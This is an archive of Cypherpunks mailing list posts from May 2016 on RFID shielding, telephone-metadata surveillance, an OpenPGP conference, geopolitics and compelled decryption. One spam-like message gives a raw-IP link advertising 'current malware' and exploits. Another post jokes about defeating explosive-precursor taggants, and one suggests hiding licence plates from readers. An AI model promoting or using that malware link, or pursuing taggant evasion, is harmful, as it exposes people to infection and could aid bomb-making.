<20160519175808.2097B6801F1@frontend2.nyi.internal> On May 19, 2016 10:13:57 AM Rayzer wrote: > My Social Security retirement fund 'Credit Card' has an rfid chip. They > DO NOT issue checks anymore. They know their senior citizens are a > threat and they want to track our purchasing patterns. Buy a little more > fertilizer than your garden needs and wham-bam You're at Gitmo getting > forced geritol enemas. > They may still issue the forced Geritol enemas (ha), but you can withdraw your monthly direct deposit and just use cash (or prepaid credit cards for online transactions) etc. Of course it doesn't stop them from snooping, but not having all the puzzle pieces in one box makes them work for it and it has the added bonus of diluting info siphoned by the data broker scum. As to RFID chips in general: don't forget that there are active and passive chips, and proximity matters. The dog catcher can't drive down your street with a scanner to see who has pets. That's not how passive RFID implants work. (Source: I am a grinder.) Before you worry that someone is scanning a crowd to ID protesters, check it against a card reader to measure the proximity. It's much more likely they'd identify people in a crowd by facial recognition. That said, RFID-blocking wallets and passport holders have been available for 15+ years and you should consider using one. They're relatively inexpensive now, but you can go totally DIY and use a metal container. A large Altoids tin (if they still make them, sometimes seen around the holidays) also holds a passport and a mobile phone. Very handy if you need to go totally dark in an instant. Always check for leaks around the edges of a wallet or container before trusting your safety to it. -S From gmoss82 at gmail.com Thu May 19 11:00:35 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Thu, 19 May 2016 11:00:35 -0700 Subject: No subject Message-ID: <07a601d1b1f8$587feec0$097fcc40$@gmail.com> http://113.140.41.234 - Current malware * Sploits run sandbox = logs and IDS current -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1714 bytes Desc: not available URL: From alan at clueserver.org Thu May 19 11:43:49 2016 From: alan at clueserver.org (alan at clueserver.org) Date: Thu, 19 May 2016 11:43:49 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> Message-ID: > > > From: Rayzer > To: cypherpunks at cpunks.org > Sent: Thursday, May 19, 2016 10:02 AM > Subject: Re: How long before compulsory microchipping of cattle, I mean, > 'citizens'? > > On 05/18/2016 11:58 PM, Cari Machet wrote: > > "In germany the id card has a chip "They can scan the crowd of a protest > and id's can be read "When we went on actions some would not carry id > some tried to mask the chip ... with different metals... "We need > cloaking devices > > This is easy.  It's called a "Faraday cage".  A wallet lined with copper > screen would do nicely.            Jim Bell There are two sorts of vendors for faraday equipment. The "anti-radiation" nut jobs and the forensics and security vendors. If there web site contains mention of homeopathy or emf field protection, the products are probably crap. If they mention things like "evidence protection" they are probably not cranks. I made the mistake of buying from the first sort once. Nice pretty fabric that did nothing useful. Amazon carries isolation pouches for cell phones that work very nice to shield RFID chips and they only cost $10. Some are more expensive if you want a window to look inside. From shelley at misanthropia.org Thu May 19 12:21:14 2016 From: shelley at misanthropia.org (Shelley) Date: Thu, 19 May 2016 12:21:14 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> Message-ID: <20160519192058.6E70D680036@frontend2.nyi.internal> On May 19, 2016 11:49:40 AM alan at clueserver.org wrote: > There are two sorts of vendors for faraday equipment. > > The "anti-radiation" nut jobs and the forensics and security vendors. > > If there web site contains mention of homeopathy or emf field protection, > the products are probably crap. > > If they mention things like "evidence protection" they are probably not > cranks. > > I made the mistake of buying from the first sort once. Nice pretty fabric > that did nothing useful. > > Amazon carries isolation pouches for cell phones that work very nice to > shield RFID chips and they only cost $10. Some are more expensive if you > want a window to look inside. > Right, but for not much more than $10 (mine was $16 and is quite nice), you can pick up an actual but nondescript RFID-blocking wallet made by some place like Travelon (for those who do not want to look like they're headed to Defcon every time they pull out their wallet.) The thing to watch for is how well the entire wallet acts as a Faraday cage, which is why I suggested checking for leaks around the edges. Some of the wallets only have lining in the credit card slots, so check the effectiveness of the blocking just by scanning a key card or metro card while it's still inside your wallet. Zippers and seams are where these things are likely to fail so be sure to try to scan the card through them when testing. -S From blibbet at gmail.com Thu May 19 12:57:50 2016 From: blibbet at gmail.com (Blibbet) Date: Thu, 19 May 2016 12:57:50 -0700 Subject: 1st OpenPGP conference, September in Germany In-Reply-To: <87a8jnbfch.fsf@wheatstone.g10code.de> References: <87a8jnbfch.fsf@wheatstone.g10code.de> Message-ID: <573E1ABE.5060207@gmail.com> FYI -------- Forwarded Message -------- Subject: [openpgp] Join us for the first OpenPGP conference Date: Wed, 18 May 2016 16:39:10 +0200 From: Werner Koch To: openpgp at ietf.org Hello! The German Unix User Group (GUUG) is pleased to announce the first public conference on the OpenPGP protocol taking place in Cologne, Germany on September 8+9, 2016. OpenPGP.conf is a conference for users and implementers of the OpenPGP protocol, the popular standard for encrypted email communication and protection of data at rest. That protocol is the foundation of encryption software like PGP, GnuPG, Mailvelope, OpenKeyChain, and others. OpenPGP.conf is a place to meet, discuss, and learn about latest developments of OpenPGP aware applications and what technical measures can be deployed to repel the ever increasing trend to mass surveillance. Topics are: - The OpenPGP protocol and its planned revision - Current status of OpenPGP applications - Interesting use cases - Key discovery and distribution - Ubiquitous end-to-end encryption - Security analysis - User interface studies - Anonymous mail and the spam problem The Call for Presentations is available at: https://gnupg.org/conf/cfp.html More information will be published at the conference site: https://gnupg.org/conf/ Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. /* EFH in Erkrath: https://alt-hochdahl.de/haus */ From afalex169 at gmail.com Thu May 19 08:13:14 2016 From: afalex169 at gmail.com (=?UTF-8?B?0JDQu9C10LrRgdCw0L3QtNGAINCQLg==?=) Date: Thu, 19 May 2016 18:13:14 +0300 Subject: Telephone metadata can reveal surprisingly sensitive personal information Message-ID: *https://news.stanford.edu/2016/05/16/stanford-computer-scientists-show-telephone-metadata-can-reveal-surprisingly-sensitive-personal-information/ http://www.pnas.org/content/113/20/5536.full * Stanford computer scientists show telephone metadata can reveal surprisingly sensitive personal information Stanford researchers show that telephone metadata – information about calls and text messages, such as time and length – can alone reveal a surprising amount of personal detail. The work could help inform future policies for government surveillance and consumer data privacy. Most people might not give telephone metadata – the numbers you dial, the length of your calls – a second thought. Some government officials probably view it as similarly trivial, which is why this information can be obtained without a warrant. A new Stanford study of information gathered by the National Security Agency shows that warrantless surveillance can reveal a surprising amount of personal information about individual Americans. (Image credit: Sergey Nivens / Shutterstock ) But a new analysis by Stanford computer scientists shows that it is possible to identify a person’s private information – such as health details – from metadata alone. Additionally, following metadata “hops” from one person’s communications can involve thousands of other people. The researchers set out to fill knowledge gaps within the National Security Agency’s current phone metadata program, which has drawn conflicting assertions about its privacy impacts. The law currently treats call content and metadata separately and makes it easier for government agencies to obtain metadata, in part because it assumes that it shouldn’t be possible to infer specific sensitive details about people based on metadata alone. The findings, reported today in the *Proceedings of the National Academy of Sciences*, provide the first empirical data on the privacy properties of telephone metadata. Preliminary versions of the work, previously made available online, have already played a role in federal surveillance policy and have been cited in litigation filings and letters to legislators in both the United States and abroad. The final work could be used to help make more informed policy decisions about government surveillance and consumer data privacy. The computer scientists built a smartphone application that retrieved the previous call and text message metadata – the numbers, times and lengths of communications – from more than 800 volunteers’ smartphone logs. In total, participants provided records of more than 250,000 calls and 1.2 million texts. The researchers then used a combination of inexpensive automated and manual processes to illustrate both the extent of the reach – how many people would be involved in a scan of a single person – and the level of sensitive information that can be gleaned about each user. >From a small selection of the users, the Stanford researchers were able to infer, for instance, that a person who placed several calls to a cardiologist, a local drugstore and a cardiac arrhythmia monitoring device hotline likely suffers from cardiac arrhythmia. Another study participant likely owns an AR semiautomatic rifle, based on frequent calls to a local firearms dealer that prominently advertises AR semiautomatic rifles and to the customer support hotline of a major firearm manufacturer that produces these rifles. One of the government’s justifications for allowing law enforcement and national security agencies to access metadata without warrants is the underlying belief that it’s not sensitive information. This work shows that assumption is not true. “I was somewhat surprised by how successfully we inferred sensitive details about individuals,” said study co-author Patrick Mutchler, a graduate student at Stanford. “It feels intuitive that the businesses you call say something about yourself. But when you look at how effectively we were able to identify that a person likely had a medical condition, which we consider intensely private, that was interesting.” They also found that a large number of people could get caught up in a single surveillance sweep. When the National Security Agency examines metadata associated with a suspect’s phone, it is allowed to examine a “two-hop” net around the suspect. Suspect A calls person B is one hop; person B calls person C is the second hop. Analysts can then comb the metadata of anyone within two hops of the suspect. By extrapolating participant data, the researchers estimated that the NSA’s current authorities could allow for surveilling roughly 25,000 individuals – and possibly more – starting from just one “seed” phone user. Although the results are not surprising, the researchers said that the raw, empirical data provide a better-informed starting point for future conversations between privacy interest groups and policymakers. For instance, the authors point to the recent shift to reduce the metadata retrieval window from five years to 18 months. By drawing accurate and sensitive inferences about participants from roughly six months-worth of calls and texts, the study suggests that metadata are more revealing than previously thought. Similarly, the government’s two-hop call sweep was previously three hops; that reduction was implemented to reduce the number of people caught in a sweep. Shortening the time window could reduce that number further, Mutchler said. “If we’re going to pick a sweet spot as society, where we want the privacy vs. security tradeoff to lie, it’s important to understand the implications of the polices that we have,” Mutchler said. “In this paper, we have empirical data, which I think will help people make informed decisions.” The study, “Evaluating the privacy properties of telephone metadata,” was coauthored by John C. Mitchell , the Mary and Gordon Crary Family Professor in the School of Engineering, and Jonathan Mayer, a scholar in the Stanford School of Engineering and the Stanford Law School. Mayer is currently detailed from Stanford to the Federal Communications Commission, where he is serving as Chief Technologist for the Enforcement Bureau. The project was supported in part by the National Science Foundation Team for Research in Ubiquitous Secure Technology Research Center. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 10154 bytes Desc: not available URL: From jdb10987 at yahoo.com Thu May 19 11:29:26 2016 From: jdb10987 at yahoo.com (jim bell) Date: Thu, 19 May 2016 18:29:26 +0000 (UTC) Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573DF1BE.7030000@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> Message-ID: <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> From: Rayzer To: cypherpunks at cpunks.org Sent: Thursday, May 19, 2016 10:02 AM Subject: Re: How long before compulsory microchipping of cattle, I mean, 'citizens'? On 05/18/2016 11:58 PM, Cari Machet wrote: "In germany the id card has a chip "They can scan the crowd of a protest and id's can be read "When we went on actions some would not carry id some tried to mask the chip ... with different metals... "We need cloaking devices This is easy.  It's called a "Faraday cage".  A wallet lined with copper screen would do nicely.            Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2506 bytes Desc: not available URL: From rayzer at riseup.net Thu May 19 18:43:42 2016 From: rayzer at riseup.net (Rayzer) Date: Thu, 19 May 2016 18:43:42 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> Message-ID: <573E6BCE.3000508@riseup.net> On 05/19/2016 11:43 AM, alan at clueserver.org wrote: >> >> From: Rayzer >> To: cypherpunks at cpunks.org >> Sent: Thursday, May 19, 2016 10:02 AM >> Subject: Re: How long before compulsory microchipping of cattle, I mean, >> 'citizens'? >> >> On 05/18/2016 11:58 PM, Cari Machet wrote: >> >> "In germany the id card has a chip "They can scan the crowd of a protest >> and id's can be read "When we went on actions some would not carry id >> some tried to mask the chip ... with different metals... "We need >> cloaking devices >> >> This is easy.  It's called a "Faraday cage".  A wallet lined with copper >> screen would do nicely.       Jim Bell > There are two sorts of vendors for faraday equipment. > > The "anti-radiation" nut jobs and the forensics and security vendors. > > If there web site contains mention of homeopathy or emf field protection, > the products are probably crap. > > If they mention things like "evidence protection" they are probably not > cranks. > > I made the mistake of buying from the first sort once. Nice pretty fabric > that did nothing useful. > > Amazon carries isolation pouches for cell phones that work very nice to > shield RFID chips and they only cost $10. Some are more expensive if you > want a window to look inside. > > > You'd think mylar or even what passes for tin foil now days would work. Everything's low power and I can't imagine, especially at the frequencies involved, it woild take very much shielding. FWIW I already knew to withdraw all the cash and not sweat it. Now if I cold only figure out how to defeat the chemical tagging they do to Ammonium and Potassium Nitrate. snigger. Rr -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Thu May 19 21:20:34 2016 From: rayzer at riseup.net (Rayzer) Date: Thu, 19 May 2016 21:20:34 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573e7a02.0127370a.da16b.0463@mx.google.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> <573e7a02.0127370a.da16b.0463@mx.google.com> Message-ID: <573E9092.5080005@riseup.net> On 05/19/2016 07:45 PM, juan wrote: > On Thu, 19 May 2016 18:43:42 -0700 > Rayzer wrote: > >> You'd think mylar > how exactly would non-conductive mylar(plastic) work? > It USED TO BE 'metallized'... and tin foil used to really have tin in it. As far a I knew mylar is still metallized but I haven't tried putting any in a microwave oven recently. Rr >> or even what passes for tin foil now days would >> work. Everything's low power and I can't imagine, especially at the >> frequencies involved, it woild take very much shielding. >> >> FWIW I already knew to withdraw all the cash and not sweat it. Now if >> I cold only figure out how to defeat the chemical tagging they do to >> Ammonium and Potassium Nitrate. snigger. >> >> Rr >> > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Thu May 19 19:45:10 2016 From: juan.g71 at gmail.com (juan) Date: Thu, 19 May 2016 23:45:10 -0300 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573E6BCE.3000508@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> Message-ID: <573e7a02.0127370a.da16b.0463@mx.google.com> On Thu, 19 May 2016 18:43:42 -0700 Rayzer wrote: > > You'd think mylar how exactly would non-conductive mylar(plastic) work? > or even what passes for tin foil now days would > work. Everything's low power and I can't imagine, especially at the > frequencies involved, it woild take very much shielding. > > FWIW I already knew to withdraw all the cash and not sweat it. Now if > I cold only figure out how to defeat the chemical tagging they do to > Ammonium and Potassium Nitrate. snigger. > > Rr > From juan.g71 at gmail.com Thu May 19 22:03:15 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 20 May 2016 02:03:15 -0300 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573E9092.5080005@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> <573e7a02.0127370a.da16b.0463@mx.google.com> <573E9092.5080005@riseup.net> Message-ID: <573e9a60.8a8d8c0a.1a29a.ffffbdec@mx.google.com> On Thu, 19 May 2016 21:20:34 -0700 Rayzer wrote: > > > On 05/19/2016 07:45 PM, juan wrote: > > On Thu, 19 May 2016 18:43:42 -0700 > > Rayzer wrote: > > > >> You'd think mylar > > how exactly would non-conductive mylar(plastic) work? > > > > It USED TO BE 'metallized'... and tin foil used to really have tin in > it. Now that you mention it, I think chocolate used to be wrapped in very thin tin foil (or perhaps it was aluminium?) From grarpamp at gmail.com Thu May 19 23:51:27 2016 From: grarpamp at gmail.com (grarpamp) Date: Fri, 20 May 2016 02:51:27 -0400 Subject: [Cryptography] NSA Crypto Breakthrough Bamford [was: WhatsApp, keying...] In-Reply-To: References: <8b5c9ba3-e94c-f7ca-ebca-630168e1fe3d@wisc.edu> Message-ID: On 5/19/16, Bob Wilson wrote: > (2) "Math occurs randomly": Maybe to some extent, but highly correlated > with other things. E.g., the effect of Sputnik on research funding... Research funding is usually highly directed. To say "here's a house, car, living expenses... get back to us in a decade with something at least relavent" is different. Even if all it does is secure brain cells away from the competition that's a decent side win, and relatively low cost. From mirimir at riseup.net Fri May 20 02:04:08 2016 From: mirimir at riseup.net (Mirimir) Date: Fri, 20 May 2016 03:04:08 -0600 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> Message-ID: <573ED308.5060605@riseup.net> On 05/20/2016 01:17 AM, grarpamp wrote: > On 5/19/16, Rayzer wrote: >> You'd think mylar or even what passes for tin foil now days would work. >> Everything's low power and I can't imagine, especially at the >> frequencies involved, it woild take very much shielding. > > A single layer single fold bag of grocery store aluminum foil > inhibits cell and rfid just fine, to the point that an activist > could easily carry enough foil as a condom sized prep pack. > Though it doesn't hold up to haphazard random access well. The plastic film from reflective (but not translucent) antistatic bags works well. You can use aluminum tape for sealing seams. But my favorite is nickel/silver-plated nylon fabric. It's durable, and drapes well. You can make clothing from it. Or curtains. From grarpamp at gmail.com Fri May 20 00:17:14 2016 From: grarpamp at gmail.com (grarpamp) Date: Fri, 20 May 2016 03:17:14 -0400 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573E6BCE.3000508@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> Message-ID: On 5/19/16, Rayzer wrote: > You'd think mylar or even what passes for tin foil now days would work. > Everything's low power and I can't imagine, especially at the > frequencies involved, it woild take very much shielding. A single layer single fold bag of grocery store aluminum foil inhibits cell and rfid just fine, to the point that an activist could easily carry enough foil as a condom sized prep pack. Though it doesn't hold up to haphazard random access well. From zen at freedbms.net Thu May 19 22:29:41 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 20 May 2016 05:29:41 +0000 Subject: The state of BRICS - multi-polar world happenings Message-ID: BRICS status update: https://www.thestreet.com/story/13432007/1/how-are-brazil-russia-india-china-south-africa-brics-doing-amidst-global-economic-turmoil.html South Africa under attack: https://off-guardian.org/2016/05/09/brics-under-attack-the-empires-destabilizing-hand-reaches-into-south-africa/ Brazil's "president of the people" impeached by too many ministers wanting to save their sorry corrupt "Car Wash" asses: https://www.rt.com/op-edge/340207-rousseff-brazil-impeachment-regime/ http://www.thenewage.co.za/how-brazil-turmoil-affects-brics-setup/ http://robinwestenra.blogspot.com/2016/05/pepe-escobar-and-glenn-greenwald-on.html India doing an about face on BRICS: http://theduran.com/threat-russia-china-indias-new-pro-us-realignment/ http://theduran.com/is-india-now-a-us-ally/ Russia and China still standing strong: - Western oligarch's view: http://www.economist.com/news/china/21650566-crisis-ukraine-drawing-russia-closer-china-relationship-far-equal Other views: - "Going for Gold: Russia, China Ditch Billions of Dollars for Bullion" http://sputniknews.com/world/20160517/1039744077/russia-china-buy-gold.html - "China's Xi: Strategic Partnership With Russia Is Key to World Stability" - "Russia-China relations at the highest levels in history": http://russia-insider.com/en/chinas-xi-strategic-partnership-russia-key-world-peace/ri13595 - "Russia and China Will Win the New Arms Race - The US has fallen behind due to the corrupt and monopolistic economic and political system of America’s Deep State" http://russia-insider.com/en/russia-and-china-will-win-new-arms-race/ri13258 - "America, Meet Your New Owners: Chinese Buy Chicago Stock Exchange" http://russia-insider.com/en/america-meet-your-new-owners-chinese-buy-chicago-stock-exchange/ri12685 Vietnam pivoting to the US: http://theduran.com/vietnams-dangerous-courtship-washington/ http://theduran.com/western-attempts-colour-revolution-russia-collapse-farce/ Quite the global fight... Perhaps something closer to US home may lighten your day: http://theduran.com/u-s-invades-canada-russian-backed-coup-ottawa/ (The Duran, my new favourite multi-polar alternative news site, with more of original articles than that old other site; The Duran is a breakaway that decided organisational transparency and fairness was not being delivered - I have much higher hopes for them at this stage, see http://theduran.com/the-russia-story-and-the-cause/ for one writer's diplomatic version.) From grarpamp at gmail.com Fri May 20 12:16:51 2016 From: grarpamp at gmail.com (grarpamp) Date: Fri, 20 May 2016 15:16:51 -0400 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573ED308.5060605@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> <573E6BCE.3000508@riseup.net> <573ED308.5060605@riseup.net> Message-ID: On 5/20/16, Mirimir wrote: > The plastic film from reflective (but not translucent) antistatic bags > works well. You can use aluminum tape for sealing seams. But my favorite > is nickel/silver-plated nylon fabric. It's durable, and drapes well. You > can make clothing from it. Or curtains. Needs to be in the walls though. Retrofitting aluminum there should be fairly cheap. Don't forget to optically drape your plates, add set of dashboard pullcords to them ftw... https://www.eff.org/deeplinks/2015/10/license-plate-readers-exposed-how-public-safety-agencies-responded-massive From gwen at shannon.permutation.net Sat May 21 02:21:03 2016 From: gwen at shannon.permutation.net (gwen hastings) Date: Sat, 21 May 2016 02:21:03 -0700 Subject: Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: Message-ID: <5740287F.6020708@shannon.permutation.net> Hey IBM sued and won in court the right to reposess the IBM tabulating machines from the Death Camps.. ie https://en.wikipedia.org/wiki/IBM_and_the_Holocaust On 5/20/16 11:32 PM, Zenaan Harkness wrote: > Someone emailed me this clip - it's about 20MiB, so I thought it > might, just possibly, slight hunch you know, be considered excessive > to include the attachment to cp... > > For those who didn't know, Ford sued the US govt after WWII for the > US' bombing of his factories in Germany (which were producing tanks > etc for Germany), and he won - with a quote, when questioned about > such an audacious claim, Ford, from the witness box said something > along the lines of "my dear fellow, some matters are above mere > international rivalry". > > This extract however puts the position "WWII was the first time in > history that the wealthy elite could purchase the thuggery of an > entire nation". > > Worth a look see. > Z > > > ---------- Forwarded message ---------- > From: Gil May > Date: Sat, 21 May 2016 15:57:33 +1000 > Subject: Fwd: A short clip from 'Everything Is A Rich Man's Trick' > To: r43026 at yahoo.com.au > > A short clip from 'Everything Is A Rich Man's Trick' > > https://www.facebook.com/EvolvePolitics/videos/1666350230283584/ > From zen at freedbms.net Fri May 20 23:32:12 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 21 May 2016 06:32:12 +0000 Subject: Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' Message-ID: Someone emailed me this clip - it's about 20MiB, so I thought it might, just possibly, slight hunch you know, be considered excessive to include the attachment to cp... For those who didn't know, Ford sued the US govt after WWII for the US' bombing of his factories in Germany (which were producing tanks etc for Germany), and he won - with a quote, when questioned about such an audacious claim, Ford, from the witness box said something along the lines of "my dear fellow, some matters are above mere international rivalry". This extract however puts the position "WWII was the first time in history that the wealthy elite could purchase the thuggery of an entire nation". Worth a look see. Z ---------- Forwarded message ---------- From: Gil May Date: Sat, 21 May 2016 15:57:33 +1000 Subject: Fwd: A short clip from 'Everything Is A Rich Man's Trick' To: r43026 at yahoo.com.au A short clip from 'Everything Is A Rich Man's Trick' https://www.facebook.com/EvolvePolitics/videos/1666350230283584/ From pgut001 at cs.auckland.ac.nz Sat May 21 00:13:05 2016 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Sat, 21 May 2016 07:13:05 +0000 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: Message-ID: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Zenaan Harkness writes: >"WWII was the first time in history that the wealthy elite could purchase the >thuggery of an entire nation". That was happening at least as far back as ancient Rome. Peter. From rayzer at riseup.net Sat May 21 07:53:12 2016 From: rayzer at riseup.net (Rayzer) Date: Sat, 21 May 2016 07:53:12 -0700 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Message-ID: <57407658.2050309@riseup.net> This > 'sedentarism' never declined. It adapted and has a modern form. Cubie worker. Rr On 05/21/2016 06:14 AM, John Young wrote: > Dear Age Sages Robert and Peter. > > Got proof? > > An Ancient > > At 08:18 AM 5/21/2016, you wrote: > >> > On May 21, 2016, at 3:13 AM, Peter Gutmann >> wrote: >> > >> > That was happening at least as far back as ancient Rome. >> >> It is the definition of force-mononoply. As old as sedentarism, which >> is about five thousand years older than agriculture. >> >> Cheers, >> RAH > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From hettinga at gmail.com Sat May 21 05:18:38 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 21 May 2016 08:18:38 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Message-ID: > On May 21, 2016, at 3:13 AM, Peter Gutmann wrote: > > That was happening at least as far back as ancient Rome. It is the definition of force-mononoply. As old as sedentarism, which is about five thousand years older than agriculture. Cheers, RAH From jya at pipeline.com Sat May 21 06:14:10 2016 From: jya at pipeline.com (John Young) Date: Sat, 21 May 2016 09:14:10 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Message-ID: Dear Age Sages Robert and Peter. Got proof? An Ancient At 08:18 AM 5/21/2016, you wrote: > > On May 21, 2016, at 3:13 AM, Peter Gutmann > wrote: > > > > That was happening at least as far back as ancient Rome. > >It is the definition of force-mononoply. As old as sedentarism, >which is about five thousand years older than agriculture. > >Cheers, >RAH From grarpamp at gmail.com Sat May 21 08:47:08 2016 From: grarpamp at gmail.com (grarpamp) Date: Sat, 21 May 2016 11:47:08 -0400 Subject: [tor-relays] VPS for Exits In-Reply-To: <1463834253.1030.0@mail.neelc.org> References: <1463834253.1030.0@mail.neelc.org> Message-ID: First, you don't need to keep asking for hosts when you can simply whois the consensus for them. Second, network diversity requires that you find new hosts, use your telephone book. Third, there are risks to asking for referrals, and to piling on top of non-diversity... http://www.salon.com/2014/07/13/fbi_cyber_expert_is_ex_discount_furniture_salesman/ Mularski befriended the criminal mastermind behind the site and persuaded him to let Mularski move the operation onto new computer servers. The servers happened to belong to the FBI, which led to more than 60 arrests worldwide. From zen at freedbms.net Sat May 21 06:49:19 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 21 May 2016 13:49:19 +0000 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Message-ID: An age sage - love it :) assuage confronting material, bypass meaningful discourse, two birds one cup I guess 'knowing all things' does remove the need to wasting time ascertaining 'there are no new insights here, I know it all already'. Such omniscience is ever so convenient, prescient even (considering one knows the content of all presentments prior to reading or viewing) that I wonder why we bother saying anything at all really - at least the time poor are now reassured 'there's nothing new here, move along...' On 5/21/16, John Young wrote: > Dear Age Sages Robert and Peter. > > Got proof? > > An Ancient > > At 08:18 AM 5/21/2016, you wrote: > >> > On May 21, 2016, at 3:13 AM, Peter Gutmann >> wrote: >> > >> > That was happening at least as far back as ancient Rome. >> >>It is the definition of force-mononoply. As old as sedentarism, >>which is about five thousand years older than agriculture. >> >>Cheers, >>RAH From juan.g71 at gmail.com Sat May 21 10:35:06 2016 From: juan.g71 at gmail.com (juan) Date: Sat, 21 May 2016 14:35:06 -0300 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: <57409c0e.2c148c0a.4e444.6633@mx.google.com> On Thu, 19 May 2016 10:36:09 +0000 Zenaan Harkness wrote: > > With biometric ID, they need no chip. > Too true... From grarpamp at gmail.com Sat May 21 12:55:10 2016 From: grarpamp at gmail.com (grarpamp) Date: Sat, 21 May 2016 15:55:10 -0400 Subject: US Case: Infinite Jail Contempt for Disk Crypto, 5th Amndmnt, All Writs, FileVault, Freenet CHKs In-Reply-To: <20160429075147.GH32679@Hirasawa> References: <20160429075147.GH32679@Hirasawa> Message-ID: On 4/29/16, Yui Hirasawa wrote: > grarpamp wrote: >> https://yro.slashdot.org/story/16/04/27/2357253/child-porn-suspect-jailed-indefinitely-for-refusing-to-decrypt-hard-drives >> http://thehackernews.com/2016/04/decrypt-hard-drive.html >> https://www.scribd.com/doc/310741233/Francis-Rawls-Case >> 